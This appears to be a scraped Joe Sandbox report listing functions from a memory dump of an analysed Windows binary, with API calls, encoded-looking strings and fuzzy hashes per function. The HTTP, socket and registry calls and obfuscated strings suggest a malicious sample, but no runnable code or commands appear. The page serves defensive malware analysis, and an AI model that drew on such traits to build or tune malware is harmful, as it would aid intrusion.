Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: Internet$CloseFileHandleHttpRequest$Write$HeadersOpenReadSend
String ID: YJ3RNw==
API String ID: 1606393314-402170223
Opcode ID: bb3122ee03779cc6c3b2a7f63ede844c85ea326d00cbb515efd2ad7883397599
Instruction ID: 5c3a5a3e0c5668b9d617d71b48a727be3ed9f0d6bd1747727ff56bab57129d65
Opcode Fuzzy Hash: bb3122ee03779cc6c3b2a7f63ede844c85ea326d00cbb515efd2ad7883397599
Instruction Fuzzy Hash: 4FC1AE32A00114DBEB28CF68CC89F9DB776EF85304F24829CE518E7295DB34DA818B65

Function 00CE28B3 Relevance: 22.9, APIs: 15, Instructions: 357COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00CE2922
_free.LIBCMT ref: 00CE2938
_free.LIBCMT ref: 00CE294B
_free.LIBCMT ref: 00CE2960
_free.LIBCMT ref: 00CE2975
GetCPInfo.KERNEL32(?,?), ref: 00CE29BF

Part of subcall function 00CEBFD3: _free.LIBCMT ref: 00CEC03E

_free.LIBCMT ref: 00CE2C2A
_free.LIBCMT ref: 00CE2C3D
_free.LIBCMT ref: 00CE2C4B
_free.LIBCMT ref: 00CE2C56
_free.LIBCMT ref: 00CE2C98
_free.LIBCMT ref: 00CE2CA0
_free.LIBCMT ref: 00CE2CA6
_free.LIBCMT ref: 00CE2CAE
_free.LIBCMT ref: 00CE2CBC

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: e3040ec9bf589dfb0b11f22c08d478daf4cec45fa4abff473533f519fac044ad
Instruction ID: 241fb1d430bf5db4aae37a447cb59a1341dadd2f1cf8d19cd08858a2123fa243
Opcode Fuzzy Hash: e3040ec9bf589dfb0b11f22c08d478daf4cec45fa4abff473533f519fac044ad
Instruction Fuzzy Hash: C6D18171D003459FDB21DF76C881BEEBBF9BF08300F144569E4AAA7242DB71A945DB60

Function 00CD984A Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 51libraryloaderCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(00D18FA8,00000FA0,?,?,00CD9828), ref: 00CD9856
GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00CD9828), ref: 00CD9861
GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00CD9828), ref: 00CD9872
GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00CD9884
GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00CD9892
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00CD9828), ref: 00CD98B5
DeleteCriticalSection.KERNEL32(00D18FA8,00000007,?,?,00CD9828), ref: 00CD98D1
CloseHandle.KERNEL32(00000000,?,?,00CD9828), ref: 00CD98E1

Strings

SleepConditionVariableCS, xrefs: 00CD987E
api-ms-win-core-synch-l1-2-0.dll, xrefs: 00CD985C
WakeAllConditionVariable, xrefs: 00CD988A
kernel32.dll, xrefs: 00CD986D

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 2565136772-3242537097
Opcode ID: 94582c6817151c8dc93770cfe3af561860f5e9fdf6ea4fcd28364b803b593567
Instruction ID: 02c377185f1a586e9a6a108650da68d43f3d437e20711239431c2ca5df565eba
Opcode Fuzzy Hash: 94582c6817151c8dc93770cfe3af561860f5e9fdf6ea4fcd28364b803b593567
Instruction Fuzzy Hash: 9801B138A453016FD7209B74BC0DB6A3669EF86F91F040026FA18D73D0DF70C942A634

Function 00CF155D Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 00CF15A1

Part of subcall function 00CF0857: _free.LIBCMT ref: 00CF0874
Part of subcall function 00CF0857: _free.LIBCMT ref: 00CF0886
Part of subcall function 00CF0857: _free.LIBCMT ref: 00CF0898
Part of subcall function 00CF0857: _free.LIBCMT ref: 00CF08AA
Part of subcall function 00CF0857: _free.LIBCMT ref: 00CF08BC
Part of subcall function 00CF0857: _free.LIBCMT ref: 00CF08CE
Part of subcall function 00CF0857: _free.LIBCMT ref: 00CF08E0
Part of subcall function 00CF0857: _free.LIBCMT ref: 00CF08F2
Part of subcall function 00CF0857: _free.LIBCMT ref: 00CF0904
Part of subcall function 00CF0857: _free.LIBCMT ref: 00CF0916
Part of subcall function 00CF0857: _free.LIBCMT ref: 00CF0928
Part of subcall function 00CF0857: _free.LIBCMT ref: 00CF093A
Part of subcall function 00CF0857: _free.LIBCMT ref: 00CF094C

_free.LIBCMT ref: 00CF1596

Part of subcall function 00CE8006: HeapFree.KERNEL32(00000000,00000000,?,00CF0FAC,?,00000000,?,8B18EC83,?,00CF124F,?,00000007,?,?,00CF16F4,?), ref: 00CE801C
Part of subcall function 00CE8006: GetLastError.KERNEL32(?,?,00CF0FAC,?,00000000,?,8B18EC83,?,00CF124F,?,00000007,?,?,00CF16F4,?,?), ref: 00CE802E

_free.LIBCMT ref: 00CF15B8
_free.LIBCMT ref: 00CF15CD
_free.LIBCMT ref: 00CF15D8
_free.LIBCMT ref: 00CF15FA
_free.LIBCMT ref: 00CF160D
_free.LIBCMT ref: 00CF161B
_free.LIBCMT ref: 00CF1626
_free.LIBCMT ref: 00CF165E
_free.LIBCMT ref: 00CF1665
_free.LIBCMT ref: 00CF1682
_free.LIBCMT ref: 00CF169A

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 7a5c36326c35e057fe6874b983afccfc6434a7d021a47c51aa367680f1d32b69
Instruction ID: 6b654ce2a8917448dcbeb6c90e9cc2458db51834797fbb4efcdbb5f7932063e9
Opcode Fuzzy Hash: 7a5c36326c35e057fe6874b983afccfc6434a7d021a47c51aa367680f1d32b69
Instruction Fuzzy Hash: 5C318171600749DFDB706A3AD805B6677EAEF40350F184829F96AE7151DF30EE88EB11

Function 00CF0955 Relevance: 18.4, APIs: 12, Instructions: 373COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00CF099D
_free.LIBCMT ref: 00CF09C1
_free.LIBCMT ref: 00CF09CE
_free.LIBCMT ref: 00CF09F3
_free.LIBCMT ref: 00CF0A00
_free.LIBCMT ref: 00CF0A09
_free.LIBCMT ref: 00CF0CE3
_free.LIBCMT ref: 00CF0CEB

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: e0e2145ff212a55a5b60016bbabab3d8b6c25238227eb3d58af469d3e514c5e4
Instruction ID: 606ae811e4ca8345942ae5eb98fbaf4760c46562b9f8358bc6ca63d51914ad87
Opcode Fuzzy Hash: e0e2145ff212a55a5b60016bbabab3d8b6c25238227eb3d58af469d3e514c5e4
Instruction Fuzzy Hash: 11C13476D40208AFDB60DBA9CD42FEF77F8AB08B00F144165FA15FB282D6709E449B61

Function 00CEB37D Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 301COMMONLIBRARYCODE

Download Yara Rule

Strings

, xrefs: 00CEB61E, 00CEB623

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3907804496
Opcode ID: 43f883b55917b4d7b6d9f53f913eb4e195b3940ec00dd537c2a9e42fb1969b00
Instruction ID: 4dc4d77f6fdcbf9ac17013338b1b69abbc4a6d750ee8201ed1511a9bf66dcdd3
Opcode Fuzzy Hash: 43f883b55917b4d7b6d9f53f913eb4e195b3940ec00dd537c2a9e42fb1969b00
Instruction Fuzzy Hash: 26C10170A04285AFCB15DFAAD891BBEBBB4BF48310F144059F955AB392C731DE42CB61

Function 00CF38EF Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00CF35A8: CreateFileW.KERNEL32(00000000,00000000,?,00CF3998,?,?,00000000,?,00CF3998,00000000,0000000C), ref: 00CF35C5

GetLastError.KERNEL32 ref: 00CF3A03
__dosmaperr.LIBCMT ref: 00CF3A0A
GetFileType.KERNEL32(00000000), ref: 00CF3A16
GetLastError.KERNEL32 ref: 00CF3A20
__dosmaperr.LIBCMT ref: 00CF3A29
CloseHandle.KERNEL32(00000000), ref: 00CF3A49
CloseHandle.KERNEL32(00CE7241), ref: 00CF3B96
GetLastError.KERNEL32 ref: 00CF3BC8
__dosmaperr.LIBCMT ref: 00CF3BCF

Strings

H, xrefs: 00CF3B54

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: aa9d11ef33570b913e48dd8fe83da57894877882b3cc560d026d3371eee19ffc
Instruction ID: 7abca1081809d193b11b932d48cbd485ad33be80af8c5f6d1e2d2b3abc1f1d62
Opcode Fuzzy Hash: aa9d11ef33570b913e48dd8fe83da57894877882b3cc560d026d3371eee19ffc
Instruction Fuzzy Hash: BCA15931A00288AFCF19AF68DC617FD7BA1AB06320F140149F911EF3A1CB759E52D762

Function 00CDCB72 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMONLIBRARYCODE

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 00CDCC6F
type_info::operator==.LIBVCRUNTIME ref: 00CDCC91
___TypeMatch.LIBVCRUNTIME ref: 00CDCDA0
IsInExceptionSpec.LIBVCRUNTIME ref: 00CDCE72
_UnwindNestedFrames.LIBCMT ref: 00CDCEF6
CallUnexpected.LIBVCRUNTIME ref: 00CDCF11

Strings

csm, xrefs: 00CDCCC8
csm, xrefs: 00CDCBAF
csm, xrefs: 00CDCC1C

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2123188842-393685449
Opcode ID: f23ecbee6a232097d4048f18dcf734fb5749ce7285bd070c9660a72a59ec5845
Instruction ID: 4dd27ac85feb1e5927af9fb48e6b3a032de9dd12070576e743874d857aa6b7f5
Opcode Fuzzy Hash: f23ecbee6a232097d4048f18dcf734fb5749ce7285bd070c9660a72a59ec5845
Instruction Fuzzy Hash: 72B1587180020AEFCF29DFA4C9C19AEBBB6BF54310B14415BEA256B312D731DA51DF91

Function 00CE6B08 Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00CE6B1E

Part of subcall function 00CE8006: HeapFree.KERNEL32(00000000,00000000,?,00CF0FAC,?,00000000,?,8B18EC83,?,00CF124F,?,00000007,?,?,00CF16F4,?), ref: 00CE801C
Part of subcall function 00CE8006: GetLastError.KERNEL32(?,?,00CF0FAC,?,00000000,?,8B18EC83,?,00CF124F,?,00000007,?,?,00CF16F4,?,?), ref: 00CE802E

_free.LIBCMT ref: 00CE6B2A
_free.LIBCMT ref: 00CE6B35
_free.LIBCMT ref: 00CE6B40
_free.LIBCMT ref: 00CE6B4B
_free.LIBCMT ref: 00CE6B56
_free.LIBCMT ref: 00CE6B61
_free.LIBCMT ref: 00CE6B6C
_free.LIBCMT ref: 00CE6B77
_free.LIBCMT ref: 00CE6B85

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 422861fc5e9dd5812bd22a387bf8cfad76068ec3bea343c5829d93d5eae6b6e2
Instruction ID: f21740be17e5ba176ced73f739d9d9526f73c0e78135877c24b127e1dffec964
Opcode Fuzzy Hash: 422861fc5e9dd5812bd22a387bf8cfad76068ec3bea343c5829d93d5eae6b6e2
Instruction Fuzzy Hash: A1218C76910248BFCB41EF95C981DDD7BB9FF08340F014565F519AB161EB31EA58EB80

Function 00CC3940 Relevance: 14.4, APIs: 1, Strings: 7, Instructions: 373COMMON

Download Yara Rule

Strings

NsPs3TF3, xrefs: 00CC397F
246122658369, xrefs: 00CC4C74
TV==, xrefs: 00CC39A6
1F==, xrefs: 00CC3F2E
3Iy=, xrefs: 00CC4C5A
TLG+, xrefs: 00CC3C48
111, xrefs: 00CC4CE4

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: 111$1F==$246122658369$3Iy=$NsPs3TF3$TLG+$TV==
API String ID: 3677997916-3127814687
Opcode ID: e0d59ab6a09d0b559f9221ca5d7fad4b54e8cf1a7418445f7192c69fb555783a
Instruction ID: 05c86ff595c65363f0d50ee2116f43e3d5132e384b421f769a42f5de7664f048
Opcode Fuzzy Hash: e0d59ab6a09d0b559f9221ca5d7fad4b54e8cf1a7418445f7192c69fb555783a
Instruction Fuzzy Hash: A2E1B070D00288EBEF14EFA8C949BDDBFB5AF05304F50819DE5146B382D7755A48DBA2

Function 00CF0D74 Relevance: 13.7, APIs: 9, Instructions: 199COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00CF0DE2
_free.LIBCMT ref: 00CF0DEE
_free.LIBCMT ref: 00CF0F17
_free.LIBCMT ref: 00CF0F22

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: f125a93af231a9fe5fda648a83cf210cc9a76cf14208f545e57a3a66ac8bb192
Instruction ID: 1784f07ae77fc3c5fd60add92570609c8598be63f5dbee4cc3877eafcd22c717
Opcode Fuzzy Hash: f125a93af231a9fe5fda648a83cf210cc9a76cf14208f545e57a3a66ac8bb192
Instruction Fuzzy Hash: B861F771900309AFD760DFA5C841BBBB7F5EF44B10F204919EA65EB282EB30AD05DB51

Function 00CD8BD3 Relevance: 13.6, APIs: 9, Instructions: 139threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00CD8BFB
GetCurrentThreadId.KERNEL32 ref: 00CD8C18
GetCurrentThreadId.KERNEL32 ref: 00CD8C2D
_xtime_get.LIBCPMT ref: 00CD8CB3
GetCurrentThreadId.KERNEL32 ref: 00CD8CDD
__Xtime_diff_to_millis2.LIBCPMT ref: 00CD8CF9
_xtime_get.LIBCPMT ref: 00CD8D1C
GetCurrentThreadId.KERNEL32 ref: 00CD8D26
GetCurrentThreadId.KERNEL32 ref: 00CD8D5D

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: CurrentThread$_xtime_get$Xtime_diff_to_millis2
String ID:
API String ID: 3943753294-0
Opcode ID: fe2544f865b4c569a7d8e55516e655040b5cee5fed38a7d1e8a83377306dfc5c
Instruction ID: 08c536c39cbe7cbd707075e0495a6cdba876c74d01dafca8f6f018b770ad35cc
Opcode Fuzzy Hash: fe2544f865b4c569a7d8e55516e655040b5cee5fed38a7d1e8a83377306dfc5c
Instruction Fuzzy Hash: 8B51AF3490120ACFCF14DF64C985AA9B7B5EF55310B24849BDA16EB391DB30EE48CBA1

Function 00CC4EF0 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 136COMMON

Download Yara Rule

APIs

closesocket.WS2_32 ref: 00CC4FA6
CloseHandle.KERNEL32(00D19BCC), ref: 00CC4FB1

Strings

246122658369, xrefs: 00CC4C74, 00CC4F44, 00CC5F1F, 00CC6DB3
3Iy=, xrefs: 00CC4C5A, 00CC4F2A
stoi argument out of range, xrefs: 00CC6CFF
3YG=, xrefs: 00CC5F02, 00CC6D96
invalid stoi argument, xrefs: 00CC6CF5

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: CloseHandleclosesocket
String ID: 246122658369$3Iy=$3YG=$invalid stoi argument$stoi argument out of range
API String ID: 2025136489-368694340
Opcode ID: d50a764fef9799705b36fe29af400c92175edaa2eacb99b1b261a9725d39fabc
Instruction ID: 70d518b7726a63b48370ae592e4d86f3139870a6a4cdd72714779bd7b091887e
Opcode Fuzzy Hash: d50a764fef9799705b36fe29af400c92175edaa2eacb99b1b261a9725d39fabc
Instruction Fuzzy Hash: 91414771A00248ABDB08EF38CD4AB9D7F65EB85354F50824DF811D73C6CB399A8087E2

Function 00CD25C0 Relevance: 12.3, APIs: 8, Instructions: 343COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00CD2687
std::_Rethrow_future_exception.LIBCPMT ref: 00CD26D4
std::_Rethrow_future_exception.LIBCPMT ref: 00CD26E4
__Mtx_unlock.LIBCPMT ref: 00CD277B
__Mtx_unlock.LIBCPMT ref: 00CD2874
__Mtx_unlock.LIBCPMT ref: 00CD28C2
__Cnd_broadcast.LIBCPMT ref: 00CD290C
__Mtx_unlock.LIBCPMT ref: 00CD2915

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: Mtx_unlock$Rethrow_future_exceptionstd::_$Cnd_broadcast
String ID:
API String ID: 3990724213-0
Opcode ID: 6fe0a8ae9a3c8a6d124c95f17b10df8f27f2b68032be4f32e414403cfad0b77a
Instruction ID: 29639433522ac6328cf0e2a28fea143001246cb757df3893288074d6a1d62abf
Opcode Fuzzy Hash: 6fe0a8ae9a3c8a6d124c95f17b10df8f27f2b68032be4f32e414403cfad0b77a
Instruction Fuzzy Hash: A0B1F271D003099BDB24DF64C845BAEBBB4BF15300F00466FE62697792DB35AA09DBA1

Function 00CCABD0 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 328COMMON

Download Yara Rule

APIs

Part of subcall function 00CBA470: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,79C85444,00000000,?), ref: 00CBA4BA

GetFileAttributesA.KERNEL32(?,?,00000000,00000000,00D17494,0000000E,79C85444,00000000,00000000), ref: 00CCAC7D

Strings

246122658369, xrefs: 00CC83D7, 00CCB5A1, 00CCC559
1F==, xrefs: 00CC9882, 00CCAF0B
32bj, xrefs: 00CCAED1
3Yy=, xrefs: 00CCB587
., xrefs: 00CCB5D5

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: AttributesFileFolderPath
String ID: .$1F==$246122658369$32bj$3Yy=
API String ID: 1512852658-2807037979
Opcode ID: 227e18f1ce49be9fff000453ee094101dd41820c652b861cd4ef811d8965ba27
Instruction ID: 74735a7aeaae4846fcd44bf021623919fa6f4c1f1af3eb788313b07241795fec
Opcode Fuzzy Hash: 227e18f1ce49be9fff000453ee094101dd41820c652b861cd4ef811d8965ba27
Instruction Fuzzy Hash: FFE1BF7090428CDFEF14DFA8C949BDDBFB6AB05304F608189D41967382C7755A89DBA2

Function 00CC2330 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 169COMMON

Download Yara Rule

Strings

list too long, xrefs: 00CC27C9

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
